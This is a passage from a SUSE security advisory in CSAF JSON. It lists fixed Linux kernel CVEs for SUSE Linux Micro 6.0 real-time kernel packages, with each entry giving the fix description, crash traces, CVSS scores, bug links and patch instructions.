"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53793"
},
{
"cve": "CVE-2023-53794",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53794"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix session state check in reconnect to avoid use-after-free issue\n\nDon\u0027t collect exiting session in smb2_reconnect_server(), because it\nwill be released soon.\n\nNote that the exiting session will stay in server-\u003esmb_ses_list until\nit complete the cifs_free_ipc() and logoff() and then delete itself\nfrom the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53794",
"url": "https://www.suse.com/security/cve/CVE-2023-53794"
},
{
"category": "external",
"summary": "SUSE Bug 1255163 for CVE-2023-53794",
"url": "https://bugzilla.suse.com/1255163"
},
{
"category": "external",
"summary": "SUSE Bug 1255235 for CVE-2023-53794",
"url": "https://bugzilla.suse.com/1255235"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2023-53794"
},
{
"cve": "CVE-2023-53795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: IOMMUFD_DESTROY should not increase the refcount\n\nsyzkaller found a race where IOMMUFD_DESTROY increments the refcount:\n\n obj = iommufd_get_object(ucmd-\u003eictx, cmd-\u003eid, IOMMUFD_OBJ_ANY);\n if (IS_ERR(obj))\n return PTR_ERR(obj);\n iommufd_ref_to_users(obj);\n /* See iommufd_ref_to_users() */\n if (!iommufd_object_destroy_user(ucmd-\u003eictx, obj))\n\nAs part of the sequence to join the two existing primitives together.\n\nAllowing the refcount the be elevated without holding the destroy_rwsem\nviolates the assumption that all temporary refcount elevations are\nprotected by destroy_rwsem. Racing IOMMUFD_DESTROY with\niommufd_object_destroy_user() will cause spurious failures:\n\n WARNING: CPU: 0 PID: 3076 at drivers/iommu/iommufd/device.c:477 iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:478\n Modules linked in:\n CPU: 0 PID: 3076 Comm: syz-executor.0 Not tainted 6.3.0-rc1-syzkaller #0\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023\n RIP: 0010:iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:477\n Code: e8 3d 4e 00 00 84 c0 74 01 c3 0f 0b c3 0f 1f 44 00 00 f3 0f 1e fa 48 89 fe 48 8b bf a8 00 00 00 e8 1d 4e 00 00 84 c0 74 01 c3 \u003c0f\u003e 0b c3 0f 1f 44 00 00 41 57 41 56 41 55 4c 8d ae d0 00 00 00 41\n RSP: 0018:ffffc90003067e08 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888109ea0300 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: 0000000000000000 RDI: 00000000ffffffff\n RBP: 0000000000000004 R08: 0000000000000000 R09: ffff88810bbb3500\n R10: ffff88810bbb3e48 R11: 0000000000000000 R12: ffffc90003067e88\n R13: ffffc90003067ea8 R14: ffff888101249800 R15: 00000000fffffffe\n FS: 00007ff7254fe6c0(0000) GS:ffff888237c00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000555557262da8 CR3: 000000010a6fd000 CR4: 0000000000350ef0\n Call Trace:\n \u003cTASK\u003e\n iommufd_test_create_access drivers/iommu/iommufd/selftest.c:596 [inline]\n iommufd_test+0x71c/0xcf0 drivers/iommu/iommufd/selftest.c:813\n iommufd_fops_ioctl+0x10f/0x1b0 drivers/iommu/iommufd/main.c:337\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl fs/ioctl.c:856 [inline]\n __x64_sys_ioctl+0x84/0xc0 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x38/0x80 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe solution is to not increment the refcount on the IOMMUFD_DESTROY path\nat all. Instead use the xa_lock to serialize everything. The refcount\ncheck == 1 and xa_erase can be done under a single critical region. This\navoids the need for any refcount incrementing.\n\nIt has the downside that if userspace races destroy with other operations\nit will get an EBUSY instead of waiting, but this is kind of racing is\nalready dangerous.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53795",
"url": "https://www.suse.com/security/cve/CVE-2023-53795"
},
{
"category": "external",
"summary": "SUSE Bug 1254737 for CVE-2023-53795",
"url": "https://bugzilla.suse.com/1254737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53795"
},
{
"cve": "CVE-2023-53797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: wacom: Use ktime_t rather than int when dealing with timestamps\n\nCode which interacts with timestamps needs to use the ktime_t type\nreturned by functions like ktime_get. The int type does not offer\nenough space to store these values, and attempting to use it is a\nrecipe for problems. In this particular case, overflows would occur\nwhen calculating/storing timestamps leading to incorrect values being\nreported to userspace. In some cases these bad timestamps cause input\nhandling in userspace to appear hung.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53797",
"url": "https://www.suse.com/security/cve/CVE-2023-53797"
},
{
"category": "external",
"summary": "SUSE Bug 1254733 for CVE-2023-53797",
"url": "https://bugzilla.suse.com/1254733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53797"
},
{
"cve": "CVE-2023-53799",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53799"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: api - Use work queue in crypto_destroy_instance\n\nThe function crypto_drop_spawn expects to be called in process\ncontext. However, when an instance is unregistered while it still\nhas active users, the last user may cause the instance to be freed\nin atomic context.\n\nFix this by delaying the freeing to a work queue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53799",
"url": "https://www.suse.com/security/cve/CVE-2023-53799"
},
{
"category": "external",
"summary": "SUSE Bug 1254732 for CVE-2023-53799",
"url": "https://bugzilla.suse.com/1254732"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53799"
},
{
"cve": "CVE-2023-53807",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53807"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: clocking-wizard: Fix Oops in clk_wzrd_register_divider()\n\nSmatch detected this potential error pointer dereference\nclk_wzrd_register_divider(). If devm_clk_hw_register() fails then\nit sets \"hw\" to an error pointer and then dereferences it on the\nnext line. Return the error directly instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53807",
"url": "https://www.suse.com/security/cve/CVE-2023-53807"
},
{
"category": "external",
"summary": "SUSE Bug 1254724 for CVE-2023-53807",
"url": "https://bugzilla.suse.com/1254724"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53807"
},
{
"cve": "CVE-2023-53808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mwifiex: fix memory leak in mwifiex_histogram_read()\n\nAlways free the zeroed page on return from \u0027mwifiex_histogram_read()\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53808",
"url": "https://www.suse.com/security/cve/CVE-2023-53808"
},
{
"category": "external",
"summary": "SUSE Bug 1254723 for CVE-2023-53808",
"url": "https://bugzilla.suse.com/1254723"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53808"
},
{
"cve": "CVE-2023-53813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix rbtree traversal bug in ext4_mb_use_preallocated\n\nDuring allocations, while looking for preallocations(PA) in the per\ninode rbtree, we can\u0027t do a direct traversal of the tree because\next4_mb_discard_group_preallocation() can paralelly mark the pa deleted\nand that can cause direct traversal to skip some entries. This was\nleading to a BUG_ON() being hit [1] when we missed a PA that could satisfy\nour request and ultimately tried to create a new PA that would overlap\nwith the missed one.\n\nTo makes sure we handle that case while still keeping the performance of\nthe rbtree, we make use of the fact that the only pa that could possibly\noverlap the original goal start is the one that satisfies the below\nconditions:\n\n 1. It must have it\u0027s logical start immediately to the left of\n (ie less than) original logical start.\n\n 2. It must not be deleted\n\nTo find this pa we use the following traversal method:\n\n1. Descend into the rbtree normally to find the immediate neighboring\nPA. Here we keep descending irrespective of if the PA is deleted or if\nit overlaps with our request etc. The goal is to find an immediately\nadjacent PA.\n\n2. If the found PA is on right of original goal, use rb_prev() to find\nthe left adjacent PA.\n\n3. Check if this PA is deleted and keep moving left with rb_prev() until\na non deleted PA is found.\n\n4. This is the PA we are looking for. Now we can check if it can satisfy\nthe original request and proceed accordingly.\n\nThis approach also takes care of having deleted PAs in the tree.\n\n(While we are at it, also fix a possible overflow bug in calculating the\nend of a PA)\n\n[1] https://lore.kernel.org/linux-ext4/CA+G9fYv2FRpLqBZf34ZinR8bU2_ZRAUOjKAD3+tKRFaEQHtt8Q@mail.gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53813",
"url": "https://www.suse.com/security/cve/CVE-2023-53813"
},
{
"category": "external",
"summary": "SUSE Bug 1254717 for CVE-2023-53813",
"url": "https://bugzilla.suse.com/1254717"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53813"
},
{
"cve": "CVE-2023-53815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nposix-timers: Prevent RT livelock in itimer_delete()\n\nitimer_delete() has a retry loop when the timer is concurrently expired. On\nnon-RT kernels this just spin-waits until the timer callback has completed,\nexcept for posix CPU timers which have HAVE_POSIX_CPU_TIMERS_TASK_WORK\nenabled.\n\nIn that case and on RT kernels the existing task could live lock when\npreempting the task which does the timer delivery.\n\nReplace spin_unlock() with an invocation of timer_wait_running() to handle\nit the same way as the other retry loops in the posix timer code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53815",
"url": "https://www.suse.com/security/cve/CVE-2023-53815"
},
{
"category": "external",
"summary": "SUSE Bug 1254715 for CVE-2023-53815",
"url": "https://bugzilla.suse.com/1254715"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53815"
},
{
"cve": "CVE-2023-53817",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53817"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: lib/mpi - avoid null pointer deref in mpi_cmp_ui()\n\nDuring NVMeTCP Authentication a controller can trigger a kernel\noops by specifying the 8192 bit Diffie Hellman group and passing\na correctly sized, but zeroed Diffie Hellamn value.\nmpi_cmp_ui() was detecting this if the second parameter was 0,\nbut 1 is passed from dh_is_pubkey_valid(). This causes the null\npointer u-\u003ed to be dereferenced towards the end of mpi_cmp_ui()",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53817",
"url": "https://www.suse.com/security/cve/CVE-2023-53817"
},
{
"category": "external",
"summary": "SUSE Bug 1254992 for CVE-2023-53817",
"url": "https://bugzilla.suse.com/1254992"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53817"
},
{
"cve": "CVE-2023-53819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namdgpu: validate offset_in_bo of drm_amdgpu_gem_va\n\nThis is motivated by OOB access in amdgpu_vm_update_range when\noffset_in_bo+map_size overflows.\n\nv2: keep the validations in amdgpu_vm_bo_map\nv3: add the validations to amdgpu_vm_bo_map/amdgpu_vm_bo_replace_map\n rather than to amdgpu_gem_va_ioctl",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53819",
"url": "https://www.suse.com/security/cve/CVE-2023-53819"
},
{
"category": "external",
"summary": "SUSE Bug 1254712 for CVE-2023-53819",
"url": "https://bugzilla.suse.com/1254712"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53819"
},
{
"cve": "CVE-2023-53821",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53821"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_vti: fix slab-use-after-free in decode_session6\n\nWhen ipv6_vti device is set to the qdisc of the sfb type, the cb field\nof the sent skb may be modified during enqueuing. Then,\nslab-use-after-free may occur when ipv6_vti device sends IPv6 packets.\n\nThe stack information is as follows:\nBUG: KASAN: slab-use-after-free in decode_session6+0x103f/0x1890\nRead of size 1 at addr ffff88802e08edc2 by task swapper/0/0\nCPU: 0 PID: 0 Comm: swapper/0 Not tainted 6.4.0-next-20230707-00001-g84e2cad7f979 #410\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014\nCall 